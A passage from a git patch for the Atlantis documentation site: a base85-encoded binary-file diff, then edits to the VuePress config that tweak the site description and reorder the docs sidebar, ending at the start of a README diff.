zuiRNIJS?|V*?p$KDRKO#$6f`CLS7)8Bc4oxTy1h9tRwpw`>P}WmqT&`T1@oPXOn8>
znrMu_$LP3+tPUcO&wc{lq)v{CgAb?5Jo!#?mLFrm4VMIP4{M0xzK%K42hiveD(uGQ
zLH5^dB6MVAKPgg9fdbf|GH(<;_Kpm9*JJ=gc`o6_xvopzGpdDp4?{ag%RR!0o{A_5
z;pA0jjI#Zf%f>I|YXQ(G=_=MYCrbt+LYQrhh&+s{k(MjfVb+4HSNMa`6?QBNJ5&hF
z4C7}lcQ|9AQ|R?vLzPUUuh?bk=U{<miK%kxwaq;7Yq+n2JPQpPz9(O{Sm*D>ZF>ec
zmjn`4CS;Xb|FRGgHYN(+($aprVhX^rAQgakl@f{MHN=BX$~J%}JfG)FNTd}$^C~Q#
z(?GJ@P`Ar<11Z4d2g)cJ`1dILaLD_bSJNz#nYmAM3TremhVA}Lnnd$LfhKyOU-^Iy
z!n82f=<>;FjT*AmalE39`_6_pBhcttiuwbKSv0PJ>=l9X{cG9F{y%3UbVjzrKftdv
za{%ipBiG^4Ydnh5v=80AL_asPb3qJxXV$3ysD(zSR<OS+7x1p?roZ%%mu2poc-^IZ
zPN(|zFWuo6S89I<<M&WEG3cfe0S^Ig+;lTIH`?XA<rPl^HG&_xX{XYU*(7@sFh%<$
zmgsNelTM0{R+ID1?<@2_WFI4z7~Y-;4h>A9z?JHj>@o4GBvv`BS0Hn2uWGQo6u7P#
zdFD4YDJ8ekjMp8-^`9$os@`dH6g!%mTUSp<B>#;Le2TwqdLZKs49Gi!SrZGvI3{eL
zQ@iWy_)?p?6<&5oSv!o-s%qxzSB=qufeuBzY~fA<!K<JO5AS7#Lq6kZQA^kCZ3x!s
zx1MCoabs`&6StaBZ|R}wGzB{M7>_HCTxU+fc__VXf@6kx)B2_6{sI~v-|St@kAu4b
znNjZayZPxS6&kOzukdK=n>Ir~LQqq_mnUSm3gX);UrPa74O*I}y4NXV0J3eKnyO1T
zLErJ%-;h_g;oRYI9!ySnWidfN7xYlajvF#Do9!#ePK@9_`2<}>CgVrX<4vLA)Y?p2
z3~5wp#9S+!%+{ut;o2s8)wEfLbo||TiBo~BPK`EB8zPBV$VzLd3X?Zr6(Q<nOd!A#
z9rZR^3g@G<5rz=w^zo%t-Qmk3EPe{(FvHKDo%beNp7=*QIKs@vY@6yPXA5QRPbgo}
zNIf_nSnsz4pU1qc5#3iFOVV(rxiuWQPv{aJ-MR1A-f3RuYc(3{miCroVzMk`XqBr0
zY?5Eb(MhSR35j@m*1|t;R2^8>`A+3!Y3*n+iIYG%!<kyUu1W4YxBL6%CXSB>9r(+Z
zPd^hGe_RP4H>{?Cxoz-595~7al@KYaHunHt+EcwG)O!d(zzV}V4rq^<d#Z(}wzWQ|
z48Dvdc3RI=@I&9~o`?L+j*Ej<Ab<g063h^h*y;5*CL~ttp#_c?028r?K6k6zI031L
znItywLEB^U=(FZ}LA14L&Mc^trsf;jD}l&uot%1jE5#k`lZTaxIjA<!gUYkKdF4wr
zA}xHfB~mZHz@3El_)9$Hsd8H|BpKZdj7<MkpSky_BAu71q9BLathDMuS6N-N(>H=+
zLcYXQ<_7n=6m^*482wmO70<iKX;qGw>V3|t=$RUd&dK?kac!Pw|A5*g9y34mdqKfu
z^@)So*vkoDU|hU%p>;gXB-4p!UTJ%e*(LD3DW9nKhU?#Us=fxG?V4ELvJ{{WiPWWS
z$bILVxZ99l06eu=L;cH@E#4<Ket{|cy|Z$2uMcxi=FUEzp`N@CP}fG9KYq>e&CRi~
zZx)ou4Yw_;YADC`N3n}f&DE)Q@Zb;EXO(jd8nMnU!&Sndq*yQA)LJizavZxIksuyn
zTR!utiH#mu(Ine@&06?Z*zYrt5H+xP)0m%%7L^=uzc3TisG@R}%8|J1<^;B~x~=f2
zjv!X<5g@WX-qf;_GXHom{b`uoQosqrcGDw{JrCSQ5f%1MFXc4y##MtdIX!J=wgX55
zD?7D$mi-}|wU4Z8t#F;A-FAXwt)~z4kEh}5JQD3U@wf$|Us~&LAbJ0`?;$J%S?_N}
zoFB3o3h_zV^bekq+E?^t5^T}~Vb9z^t}fid$!a9xnE5Wkp>sW5E@$*`<xp#(cFn-U
z;+?v7r6kSEJz1``TJd0nlwsX~Y9ChHXxcSPE#aYw^+t8@LTw5VJq3u7BAvoIUmHe~
zVne{oF1N2YFxX2hc586{5&K#6p$E8QbIlIpHNo{#KXDap-pPtVJ2S5wSeG#7#C=u$
zGFI#xmR6Wp9;LK!4p(cjpw4@^?qT2N#V>GGhC-uTB}VXkpi6nl+PamA?O?}?cx=6b
zV7)c-Zc*ys2i+L!f?<20-qy|Z+0y)Ov+~QN`^B<??+NxDx6CNyPHG9kcH>Oke3|tR
zYlXY(-20`t_mmaP-5Hu!<I+z#M`-;=^UB(Gsc&+%Ry-6k9Is1qYl|)G^&N$7TaoMD
zP1iY6)!K}SYA9697e?aIOlIFOa5$~<T^*(*+hqE=+W_kbGfbZKu`jA}t%hw!@9r;B
zja|~F^INJ5ZO7VpC%joLRMpiJ;|An=kGZEdehqIcSGP%qPn#7pQDt>|?JqL)KBu7_
z9DJmz(d#slO^C7oqUw0EB6*}aNqtbL^qoL=q($<Ec7FY?W@S{<;b>2rIK9!V%!}#x
z?Fe;5&7fBj$I<yugou-wlG@1JQpg8q`3LfW^eIo7S|?P`(zx`pX_n|<ZMwGNrmMYN
zf|_EWbktUoH{C>$a%&C=nJQj0UM7Apf!xDM+S9Su&6csooogl?Qonrb75@!MbAh2{
zeU04;NM1#82V9OrRS#Qu4h2nkt_AZ#yPR|dwbm16rT6RRXc+DfoF_kr_njPMYwIIR
z*#GLDhhTub375T4)FM$zXxJD52=5sTEv}W9&&T*oOpIoSkrk|QCG&ScjTRnJtQ9oK
zu-bmJ+>&WarSpvoCCAZd@Donid369F75V&!afY2gRe}xA)k&OO?E)~>-lWmfUAX|~
zQ1k8?AIsz6W#1Umd9TN{6-<0?y92VWvEpI9j&w8-^nkl@UmM|^WfVQ(9KfBzBlS4z
zLDl9mQn^LbD(5sAjIF*r*jNmwjyo91PsuoYHgjqdbAETPaPvIYhUH(}zzsYfi+6Z3
zT~?V~<YT|o+EIRHuD*<>I>g!0vqWq;p{p{FLri;#?s*vk{Ui%?d+%el^%T<wT9tSR
zY^qXOq*YTrLtiTbZow4}I;{bmDV<h@f%N3e&=cDCgGMlBbJc@SpV#LP9KYUh%`6xu
zaqpu84f&JpqG#|r8JWHIgOU4<_ZQb#O?ETL^?VM(p7RItSBh*Usbi`-xr;kqTu&<%
zgsFfy48~hdDrE3XT%zi}Wlcswb#vj=$%Us%If-!F4sq<l-1%<V%PF@B+a7zRqNi!g
z#@tb@a;nih-B5d-yfLks*D3f6;ipe{T*mWNN+e}?XhwTL5!bP=(pbEr>2u4p%<rh2
zhY}7P2Z>mYC=X{V%`)?(y?E@{4G$LevOizulx5~hz+c_#GhGVkZC+ntvngfM5|ntR
z*Q2>{>Ja^9i#Lh{Vn)!eyi+=a0<%~FjZj1R3u0Z@*xtkD9BQCbzM;uJ>s8yt@RDW?
z&@9#IkhaQN*}Isa6)4iEX<<paQb|Q7orpGNrkq-MsKP$)YT&K8zl)liyTBpr?i%r&
z`CWdgfnT8STOzhi_l9qhR7#tYKRm&x&zSw&6K&Rq6YQ~O%T>qQRkzc(Gu3WTu*p1$
zS+Qj)Ta>#N)JJ$Uh_oLzpKjOg2=*3#TD(!^8*Arrj@;nf>Kx!uby=KuN-{*gf<<vt
z1DsaTiD8;%ihsGw1|Sv;Tvb_;dOjF0-?Q^RIXb5WPp&<R)*L=7cKq<P8x9-Ez9#&s
zZ0rp9^7e58|LizcPV=rjy$<Wm%jxhNn=(}TYU@U5RhWSqPZ)g1BSE>m8S4gNx>*aN
z8|20kheVoQ2bF-Wghj)rk$NvSZPk%;=XI~9?d#;J6Tq}Dmgw_E7Ecob$2CDFED4Pd
z9IqK?{y7ylms{8)vrX9j0@^v}<eGsrj<@_5^Z@(i{l@6s;kHtzG`Dx&><?S^>Joxw
zi5cnmTkt%GgX3}b%x3G*%L2o)51bnhnmee7xbf<Z)mmFMmX&2qwoznAXXuiODn@xj
z-;3bxJbAl+G&U{P55`@@+iw>%U$uS!cYW8as*+b#B9&X5<|?XdG$4$4n%+h7SD$_8
z_tx3sve11)2>}I#UC72uF}$DY^Nf0L9)9n<Hi7BTu=88vyaf?h*Oeoc^!F{{3nfqT
zL9IM>fs7V!jxy*dr<_!S>hPvjXs&rRpf^+ZDO58RG*Jx0=T!&_B0eXl$qm@XAo@9*
z%{B0MG_&4JD0^S5Ox8Er_3=8ct;V!tL9@U-2O|1GM<2QAUrTDJ>g41TB;#mdi{V-P
zv}>>&Zc(S<OwH9zpI8cOfO<@Y4>*jGD-j2dOvd`c=kIl`Eay@UALrIBs2<$)T1~=3
zf@%=}+yb;`>=AJ?4m~sRpO5$~=@N?FjcMVqP>*b@1K)O90O}2LpC5aLRjR%B$9TO^
z8=5&%G7icxO%5b1Rdy8VresqB&n-m+Y6vqumXi0~hiAXs9q;U&aRwE?WZqHgG>UyF
zYf**=&#nqKpYGUk(6Tzcbn#NrL_$(HSr2S7JG@x--MSwH{mkx_=3(;Pv-L>2-5Si(
zW6rXfvHoK2LE9)5lhJPJi<@Xl^*e&1d@Jn3X6+%u%!!!%gZ%;TEE!kz`6jbUBPl1(
z=I4xwtIbr5S#ZTGwhpM?R201TC;3GA?^WtM-&Z%yoy0kR=RWT?gNJ?mXvS`Q=09U<
zmRUbEd@dsx^de*YZoddUu5NLL)Bft$fTZVup*WDXMVK{pqT7Ay%KBi&dH7<5|ETHR
zc*2VA<{9}@9bfrilHreG4Y^_4gr1QGkyNgc8ME^cSdD#GD=J|;112sJ-2%aLdnJv>
zIGsce=27VW!$Q%#$m!=+`*>d4>Yk?s&OoA*(^zJw9DClKP82jQ%WA3T%6a!Zny1f0
z^_LUVhUk-0SKXv@!FxS8bgC!*sckSUo%(ZHk=1jk!%~RJ<5@UlJUPq9q2y^dcYob>
z{Quy&uM#{83O9(cro7KQg6ST*H{~Z$MTnHM&!R_VWmS#~lHXI8CFT-KzpLw%9;Yi6
zG}s5RIMp(TcZd?&+aE48sB<)!`Sd%X7qUH3;T$fPPP0Sr73_z9Pn>4lABr}o!&_-Z
z_76A**B<w7fb(!h@PJ>zdL(f4vw9fSjnheL-jv<P$}}t2nwG7<Ym)%ZB-3E*jbvNb
z8pc`h$9@~yzYcG{`U$!8#9G@+ytMR?@7Dej6^InB+cNt@(k?2AUm)E)?_iF~?}6Py
z<7+iuS;7|k!UaiA%Y_U#i)I;(7<r0uveL>?W6i}z{~W>I{W5>fc?T==W0Y}RviX2U
zoWrQ2;)(bup`KsR6{1%%_vjbR_?MxF9+P2j;7J23VHCE|Z2gHbFW1Nio-GGXQ4%_K
zVjFf)zJt><%u4-5wI#h<m^XpnC?U~_*u(XGt=@``Gc<Ua9LXURvMxH1Nm)N#7yq2b
z>m_uUQN%x*N5tQIQ8gGZMR%jT#tatraVEqq3X(xp4QT`Kc%)7p^L?X{o{MBWZE~r+
zBJXvpP3?g$$Ya)jIYZnhV4viA%nW}iGjv-vvVELl4d2j8)~25{!mxO<DH{5zcFaxj
zbyeZ(mKFSWPQ#iZ+TDfr;qpm8XzOVN+1;2zoP3_5WuiIbTy$OrVfYj!!X5g^)@$&Q
z!%*U6W`=F+V(uFpE;m1speI_iq4Yxafx6ipOXkh_7!K-=@}zuv-oLs=Cd8lx@RQ#*
z3%{=t9LhH$Ase^jxGaRyCA7m%>=6mc8qVf8o?0ZmowTo(lq*@O&CYXGgr@r`o<8Ff
z`)XAM!av5TrB12U6%@?$?OVV6WO21hcMotoW*>o~B+<<dKf-vtkcq?~wa~crk+GxE
zyZmWRu(zWPe7knA+$?FV^$^c@5iI2?>HNOVdN&wX&;O1YYCkpBJgs`L!)MjT{TC#V
z?l8WujeelGGYS?8ji?%{qYTHC4tfE>t%rhaPyVG!6lgV7#a`w<gMtEKraZvD6-cKJ
zIQ_CZ`N*$o+HZ+bC~IttRlw2OjZePiwyv?=ePxx+i%9LQI1snQ|C6HAYAm<6PSr5?
zqV!JcK{3}dQ1WVhFuwM4MXT4Yg3$4Kt>rXsA)IwoqlA45k3CHsX>$Dst$Ff!)|sW9
z!~9D0#Y+UN-6)6pRrlPw>zBzwy4?$uha>xE{&0uQ>&aP$>`8m?8Pq^1&^GtN67aM&
zmBuNojot@!8sB!|8%8zo-G22A-o(ut&bCqTc=6UPz`WU^{`(^10I=JzE6977F%ji$
zgW~w1irEz|^jQQLYfM0?xdqfuh8UwaB_1+uX}i)W7Z#0qz1#!L%KOp_tnCx5D*o*l
zQR5-i?(=P`wD7W$0^TLARxQUa&Z#>?QKD((3^OTZ*N)#|f#BtTV}u5X5qVeJR-XX7
z{C-S7SpK<#_c$;XJ)SmzMNXOKZsh0$_xp7;`TvT$&Zwrgb*q3Pf`D*@L$`n^3hJRs
z=qN=bs0c_G5vd^v#0VjTCPk%K0BNC_gx-4<L{NGs5Fm)ugeIK?$lKg|&K=`%;m7;+
zeq>~1jFq+5nqS##eQVCW8);%IlgepgAblbnpABO)oGk>8-o6>nkuB-kn{zv-Thae}
zF-uNyQCHPm)SVVBBUm|-yS!J!TA;yDeAS<y+P@;W5_V64u>9%@8zk%OIj^(cWlEc?
z8DBUq77U)`7Jz%Wc%-WSDsmb!wmPbUmsUGY*$IRt>YG>VkPW@CXI|YFGpW7(?Y4}*
zHT4Cx(Bg{H_SG`?2jADe=2Q+8p3Cws4q(_F8t?@FKA+$|MC-xw`nL;6ZO(mwk$#A#
z!NV;`gMC|Ehyd18!wu+Lk3@+(&#jdfpAYp_ti2cN^VEj3-y?_AupttV#m*I%Uh2ZP
zf>r%Odr`D`2ME64K0yX*Wc)m&t@CnMe*p(_eKEIMN2t68Da0#$i%$;D$kf%IUMY?F
z_KGq^)G6NlK!+@#P$OX5)fh?X@vtEG@w)X5{7qhV;j4-Ee2UkG7RukE8hxg3n=3o{
zPn!atwRVqke<$c`9kq3Eu!Vwqlv=K@XeRsxpiJV5ygCpsLRJteqi2OL{oJ}<m`xFY
z1svxe(HjX<xJ8{F9Od{~OCr`_Er}ap<cl$+=P&h6%@9mS!e{K`45#~dHoh9f;`Y}`
z8%%)X$NqY=+CY`_j7$qIV|2_M3-c&s!}U6(g`7$iG>hNDa(a!H(;Qq@6(ZIg`MX;R
zgQ6wi@Ht$F)lyD)+Gof_Z}O{ocxSQ=$Oc0_&Uay?^_i&qB}n?ny5;R}U<170g28-Y
z-wpC3ShiAnqffk~(gv+U`auMH4V#~NWm6JoZ_3jkMMvuvM&##LyCQECVBtlLDEwpZ
z?<%#ph@G^ZcymYP-oDz3JIp(U$G5+oR}3_(T_=0K8F&s>_h+d5k+H=#Q+4AS!uHdx
zjKUR*pcSc=*?jrYm<Js5E^I8CAl$pr4tdW2GzGb6k~_sp=K#7PE^ZVZR$*f6Q6nOx
z&||KopoPz0M(W0F7Z}QM@;iWHFKeC1?KUJp$Jz$nRyC}QmxzI^qGWBtCccnSo!&1X
z*LJ9}=S@`$<yM>lyM<5(nKCT-L=}$b_#F@n4O~?Z;kt`X5~b;L6uCryU&v|+WGz$_
ztO(d%{1&^V51YPH;{GtSv+Z(xb{)<<O(%%;UfdFUJraW6UwZAl1r*_R8QLIzbRqo0
z!}(9&TNDnS*uC)JQ-sqwzn=bJRkcA@o7TkC)l-f|plaY9T4u?p4Lrs?J0tSh&3bQ)
zvDlBC2R6@UE*Tq|U|F4tQDcM>NXeWbE;qCHnNINw)0zmQ*yQ-vEc2s<rs98@+Ud2h
zh;KfReBo}N9ma#~gLQ;wJGsQ9HnMQ^w+W?6I(xJbtJgdgZ0pIM6a0%WvPbD)EWHSD
z#$-INm4?gBq;1xqOnqFN*riLXtdAP4BF3chz07^lwAxuuhfz)6K~6L#vr4Nb@txnF
z15A;xJa<F3hN2?VO;SXSe31wfd(OvUH&LI$X1S~c_y<IQoL#4xm~&1Ob}vR>&gJRl
z#V_h>UsEe?4R_+rm4vl6`(;klTq{$}`w&(9z17ege1)KM-st9FqzMJH5w~=b=gSK=
zAI&((y+k*<Q+TpyyV6N(C!u4DKQq*k$JbKhIaxTIVv?ViwBFk!S#>$gR#;dx?3_+H
z<IXpT?cPd=G_uxE%bROYAViL=@sG&=<xYE*eTCccCrHTgXS8FHx2;X6&)Asn1$Ww{
zl~p8UqU!N3)nsW_*2H+cwcd3X8bh9WEP17I0RHS%CcobPnwi~GAp2?@pLB&W3p+$C
zb?6?W%oCyMT`KTT5pMzWj)@LDB%m2bvADq_sG$lqgKG%OxEhO`1W-#+I@A<0GoaBY
zlR?a}!-bhfrJKdwiRi~-ri5zML9PkX6A(gYAE@uyh{R-0=EI6tr+9c`9Q5C%_h%C_
zbmPA3coaGJnP5t)cDt?D(=yDjOk#vm{N1ZgT}3b=3n7bBSJ>>|=FT|}B%+?bZ_HgS
z>Dl6e%qBz}{k<TIf7TQ|=yZ&Bnu{Y~QFZL5_#D5{pLwKLL^5szHBtM?llCNDuzcz%
ztbJ`U>0XYk1V~kuVyjWs+%Mfzhv=HwST}@VG}eK~-ccMnsZ+LV!+8t7lwK;oQONu8
z^JlnndU2?@Or~q%CwU$VcoEHXYm+j`bDKyKD_wi_v-gnhO8D=<$|{i7ququ!-VG?<
zt&$7mq+hUUX?2*E#Y{0hLRjj4MBeNQ9Rc+vz4Iu^qxUGf;`Z)O3$9CdBCfl9ylCcq
zt8F~ea%R1&XEhr+ZXss3<!(A;7Xr6W)z?sd9LLK@d(l@FOcvN+iMmVp=oyRBcNn;N
zI&ny&*@&RgjF!Ob!Q0C;gKjJ2?m`Wn2w7{HPW_F{s4g|O&-(pd*rA$J$>w}jX^?xC
zMGnPL?TMM(v_cW~OLKk8;JVD;Ec?!EeKqzdNDsjhhC;r#PI1JSRF_N%jO0(e<850F
zWEz-l7YPq+eYBMLDY%7ai@cyvledmIGw+I88QQU5@|ePgHhbCR6cOU&i&`DhTf-8H
zw}##PMWvSu!Px~;pLM8#maq}3{CGSc-M|lJs<R?uMTIXe_e9mSg1uGT8RZ*u(VkX?
zw0TxfuU&$Cb|DQWK);6WNlE176<+Nw)Y<*4w98U=*|hpj>3aF2Tnd!iR#na8hkUm9
zJ18-@gw!qK&R+KPn-1@F;W8e#hNOC8i5%iB7ejAp?7Nmq#{5(ksmkNSanCgBjVh20
ze{>wFEo^AVHwnHjv(GOb5s8KPFF`$y|1?+iL)@b!t*lLhI@0PMRydVt=<eWGYCu|-
zc3dhn+LlFZ7!#aruBF{K9Lkav?dW$U%*juGQRUsrJo=*jSz8swxq7kfsg&2;FZp8A
zwiHaulmltIm`mf?Y;TKZCR{W9@p4=2rVzAFKaiN+!U#(<?i{^*O}rR_o+tYDXVVvg
zGcvC{w1Sp=FIbXN!}1J&H$E9aC$o|?9Mkqb5)*a$<e4^9t4#dvkbaQAcyPJ$19r~*
zz^eUBJr$=t8qBX|1IN=^6KCt}4U4WP>$e{j6C*rIoeU8?FL%nb*d=baz|%3b<k)DQ
zYQ7<;B%|fENOKXAb6c}QT=ip*m}%mM0=Tk(ut{|8ZCYW4;1XeNj!V+&j7u0Yno_B;
z3g!D<@pF2;2APBA8>bl}%h9Dg^c$Ovsu0N|BeYdXiU-sd$wm9?c9(y^WFac`jo`^Y
z`Xe+gyUlTw9CM)FkPFiLrR;8S<+y6Sh|GoLvo3E|R$D8r`$UP|EPP9=Z$I=Ggx6P=
z0=0`A1J6c<Ev$DRu`<6v@`LqAeG_bI(e_vlI!%&eSn?!YX!<YhiL=Rffo1b;H-)-~
z*i+tm1$EE?yP{JMuAyI6V!dbi1fcJEn38pNCImc^FIu>{wjG6%J0=T7?S_^6JxtMq
zI{MhqhoI?5$j6<rnaeeyKMJKOXeQpy%lI4;sW=wa7Vssh7Niw%Oq6Zt?yECO9d+ut
z1HnC&73<u2#MCW)seai`iGfiTM>Jn9XmqVlv=Y~-%a3UnAKnn}wZ0%~pT0Px?i~L)
z@kPh`O6ccyUh0xKX;9)(``{LGtEaAHU5@HG;(6bw1KVBtb{(=5Kd8@%3+rba{+2cT
zq%x|M_LnqeR8u-Bl~9Te)h~u|32zbxp!oTU_0RNP(o;wGNA%Pl=}>UvV~t}9BNKS~
zHZx~ENQOs^0jGPVB$E6S!&e{2&7BJ+A(A|c+)y?s%M61oZCrf1D19LdxRb1dzE^4&
zZN7nRv-p#*>VD8q3YBW)i0S~9tae^9_57}gUsQJMloOA85rs5W_Kdh!@bvX@vl}gz
z^;CSa|MChb?d4>2@**ggS5fOy5hhgP<W<N-jn(7M+9=@U6#<`Zb)<1Tiu!h$Xx-@{
zZ`+wH7EgO?v2)eODRF|##!T!EN&dh!T>3V1dZBKrk(uMOv>p)y+Rgtq(C?Js$hRVh
zx>q9BVo2_bSy_#_roI&4DXi)Tge<m=Yl*EC1b5Dq?AQ%CzA-;Hn499XGe9A?K<(_c
zUEnhoGG*Q$B+C{+T*@yKuv`@7j{X>K)}G5F1c#MoHtFff@ZwQaieexG)4IGcyNi;t
zYeZn8TUCL0*3M>v2ZbC>pvS0F&R-448!>So%zNXWw-aXIeCb3rG#JyyQeGD&TQDd!
z`jt{g0&NEGJS?{<=4wyGm7d%Y_!;Yw92%=c@)lo}mE5=<D)^$N0zRT=!#6OqQ(kC3
z=}CIWld4DqZ#yo-Jm-{m)gaPOXGG+4I?gqVQNf9|H}xc=vex^)3Mp+`Ebpr=`>03)
zbS5cIFEOGFj~@e$Mmov)UgVa`kco4g^4s0Vp(|1gVd<hmPlz9#9~Cz<Pp2;)gEL-p
z-Mv5=-_`fabyQ$x6a36*LDf=TB<Tv?F>LK(0-knlapW8U>v?>KyY^-NJdRz)@tiOV
zK4&^8Aq&AAk3u^Nw%456TK{p87G&6u(48KR9XRDZRckmheKk?hj9b}^y&&3GUp|lJ
z-7(-*fy}-eilz7*BaOr?f^rdsN}j1LCU@C4jS<jYLV@mZ;9;eD)@Ov%T5Eh!*+}|Y
zu3VqH-^T#?DHEM2NRQ+O*7E)GW>T`raXSTe8pTF0x`i&1+xF6}o_+hpRT*6h;hZJn
zFLtll8@`Mf>qY#YKuFCi+Z0DF_M!qB!{-DZB)m3&k{f@o6ctDD;V|<!KEWzYbcot+
zH{s;!5}t?BYFv4V^bYH-4(%_-!I|RkQ?|@Pz32Q*$g`~)^6=FiUJ`LJ8IAM~hID#a
zZXR#*1+6gb4?HX<5P0&A3lp4LQ9$wq7hOLW1B6{d3=a=wBrbE++&HpZvfJsyQ|bo^
z3=TJ#I1|SKva$A<BZ}#BG74ph5z#DE&s>9*CQ{W6=&{$9)CtD>(bCI_MI`AfZnk-?
zH-A}nH@Nu`8!e2Mu!2ats43JsrZ%{jEFqqNtg+Ro_xnLhCAO`KTmA8ph$6kH1|d>%
zyf<MqzR{)yTZiTV(>~ZY|2hh5fg>1}Gs`c-Hy*X(-b3^vQrNay5lkI7QyEDYX>UU=
zO?x>MGBzr2XPuN`v}I?hnHS;PgbzJRBbZU8SZW4F*#@tdo3#)T+8d+FKbonFd|q=m
zW@IbYu`RGC10{8`oMXnb(;fD!A8(^$cPB`{O9l(zUl%Ec)ld4&LjR;~e4lKo>0bF@
zI~&@!u8R=$)pi2|^>t^q5tpy`&UARI=y}@^A1_|Nr{83r(vQx3IP{o061)CtWquo6
z@hjwp{MD8fU$Q1<v~q)M$3A;ye#36M49te8SX<eUw(hrF_0YBnef+(!(*P`LF8?&G
zo%fIJ5x8ZFd!L#va_$(iriZ7mRKsH^3L6$Ah`S%X(Q{>ECo#&nuOiVi(z$v<b0Gyi
zeH(=W>!U3{uSJGw=T#NV*L)3{&8n$8x)V`v^U8B4M09Q3NJ3BVOm}Z}hdr;-G94_#
zYSPTAkn3(@vM9~?k2J@mcJr`q%vXu~i_S9D=jPHLStfBmQ_3x+-{H>6?CB?(DLqsK
z1&-vorjEwlH0{`S3l&33>>_L?ckk7f&v7K+qeVjN(>(Uw<vZ^JJF_;1#O6|6?Af~6
zrlsrW1_3t<HICu&oQ{K3Oz#x8x9|o@)<pkgK127@Z)Io{ZUIU}jFxH=Wa=ys%5I~2
zD=6n{3b_dz3aB|vfu_Z<AxnBtiGfWd+-+JOtXCD@(qd3httM_N_mw98F^(L{%#nU>
zQskRhiA)j1k?;@{zLoINr_D}&xqt&QWSGv+=a$p@!vHj`&Cied=D0SG8feb2)!`fb
zj(V1}Tq%$N7I0+E(9CeQ|E&>c9g&^YoY35?tdhM^V2mNpj~bUZ=P%pbgcPGJ6xI1N
zUGDz|PfproWZi9^#n*Ay-^##{tDFCV03{e>kMfd+UhrgZX*;-le7^a|j}oe}^3eOI
zu+riOrt=mBe-$7uLu<=s;n64dZ+ae>0VRiTsH3r|TR#92S0F$T04Nj{0C%EdETSjQ
zUmCmN?icWS1mWJ8H97RlE3=e|RqrkPi8EC{)yEVoYdOuTyzSw|dFiLM`Glo>B})$^
z^(RRHJFAL-&8n_r?{8?iM7(z5>;&KZQO@#;Q&_Iav8B{*Jcz8=5l3wb^_M64p{X7j
zsu7*T)pa}j_h@_Fzc&WP9D|Sr6QZ(I)#6=c?-XyV)(e_8Q46?h`b|tzus6dcO76DD
zp9>o7)*hV<2RPV;vSqUS&z*qsi%J2&5fetRHCa(laE#~alhWQRYq@|4d8ul(FBdZ9
z?=-Cc;)dw=(-ZKGM{E4g)?KUnuj8wKRdGVE0cTj7ShIXqV5agu<4e}?h_Q!@*RIqK
zs58Hg#b9L<@!HccsE{kvFMyrZ;y~(lXByzdq0K+OkuCs)Y$431yr_a!T8T*5Me(5|
zBS=R8R>Auj;=Gyik_u)kN@|%H_kS4Bucfnf=}+{7n7V+tkYHd6qhmY(kRx>Yz)C4N
z^omjTZGaHU6)(4QN%BH<<JBX$4DhEVN;HxD^BCDcAhiNSxJ-0^qPerWw0@s_uNa~C
zcA@<crn%2qU!w0tKwx3#x_q2?T~X1TXSO}Ud&2r_*d6nYfj*PU>hsG?)J^B;67kiU
z@}Qx{X5;(0d58|d`9aRiKQE9VTL+V&KkmsBVsgR~1382n^epFebyM2zELmEIw}C&E
zj_>icJf+>eRVvI^D^vww-r?(a*a&QODCOy{nA3Gm45cSJ4)QN{J1@Y9jk1%kVF1yt
z_vjxuA<(Za9vR7VUa7y9NKr=fU4GJpwO-}g9(f|mtBNV+&1re}5}p%A{8ajcms+O9
zt?uIiGeMl^<qA*F`O@#ZCI0>M2|(awS2vRo*z@KBos=r_Rkw*O*M~+)V=PP1+_diI
zadVTBnum$d;q-d(%A#zqQe3)+xMVM^)=-}0<Fq!9HyK$mO^3X>Tj@N{0rnZodRo+^
z#&8&Qwt9~`8(OaZ3Hbi=#I*w_u5!dzjtemVuXgSJjMKuxjvd_+2a`m#GysU6&h^Pb
zIe`#_v-hbVXrZGFW`Ijeu%Kl^fy?&Dxp5!dol4S;J+i6#JIA@mBdYZl&!7KwpmUx$
z+nKeO=$jK`Wkt2L+Pran`-`amj;x4JK(mlRD3iIPUqHZul34hE@#X&Y$IE-9xhDdG
zY;7W1!9f;DtOs`o$Pj?>k)|7rLjkjO27fX;d9YR4gY$ujzV$8l(ggsDy;yaa-l!oH
zXjip<mt)|~*>fSFXzYG^#J^XxD&4?3R@gkc5#<jgsM_$fbBEwE287p=&JzA9FmGLr
zw$S}Y3xDTj-{U~Sllm0FJeLjNJo@^%(jonIdhOwCn^*t`_~nB+xSt0D6X63iW5U~q
zSlIXl+*(v69fET@AR&pkQ!OA00dW2hmc)B-cRnhLdpP?xTn+_@ot<T9vr~uRi~;bw
z3M+qc3&1(}>VNI}|1o#NUOTfFI<7{q&z>u%M)x0rv+EwtMyQLo9D#eu@b(X;`<7z+
z))@cUV|*^~;S@GA^GfKRtJR|@^rZa(2vVd-XUZS_t>)@Jaj=_fodyQ`$L!2Y2duKz
zBS2XAGJ^|tm@<Ps`0N-1QxnqjvLwfO{F326wC2Mi_y1kZBdTS`^}_iuLEIc5h^tr1
zzYlmY1JkLl)T@U%UeTThliNn_0=ErI`h$T~Ir|*&6AoPNdn^{v9Q8y>?caF(?KThg
zM3KkjZ;r-lMX*B^)sTn9#SC!OF36^^2Jn5uZ}L#x91C#WCqB(0jzGMnjRfsqPyN%q
z@5?<MA#PObT?M=FXD!X1y9ZB1>m=Y2pJy5y92iv9o~&^fAFOoq?FG`Z*8DCss-II>
ziWww(aI>Qf>;Kj;T<ZOsTy==hjot1)Cygo*UviHgVvC49(LqR$k+!}*Fv{6Gyng?L
z)&E|<Tn0pu5p)UsP+eiI;8MY4rNg4z-S^RPCYq3H=1k|eS8BX~!uN>wZSbuewa0${
E1A--qssI20

diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js
index 3132b1c618..34fd2d09ea 100644
--- a/runatlantis.io/.vuepress/config.js
+++ b/runatlantis.io/.vuepress/config.js
@@ -1,6 +1,6 @@
 module.exports = {
     title: 'Atlantis',
-    description: 'Terraform Automation by Pull Request',
+    description: 'Terraform Automation By Pull Request',
     head: [
         ['link', { rel: 'icon', type: 'image/png', href: 'favicon-196x196.png', sizes: '196x196' }],
         ['link', { rel: 'icon', type: 'image/png', href: 'favicon-96x96.png', sizes: '96x96' }],
@@ -33,9 +33,11 @@ module.exports = {
         sidebar: {
             '/docs/': [
                 '',
-                ['atlantis-yaml-reference', 'atlantis.yaml Reference'],
                 'pull-request-commands',
                 'deployment',
+                'server-configuration',
+                'locking',
+                ['atlantis-yaml-reference', 'atlantis.yaml Reference'],
                 'security',
                 'faq',
             ],
diff --git a/runatlantis.io/README.md b/runatlantis.io/README.md
index f2311c1917..3fdb030333 100644
--- a/runatlantis.io/README.md
+++ b/runatlantis.io/README.md
@@ -8,14 +8,12 @@ actionLink: /guide/
 ---
 
 ## How it works
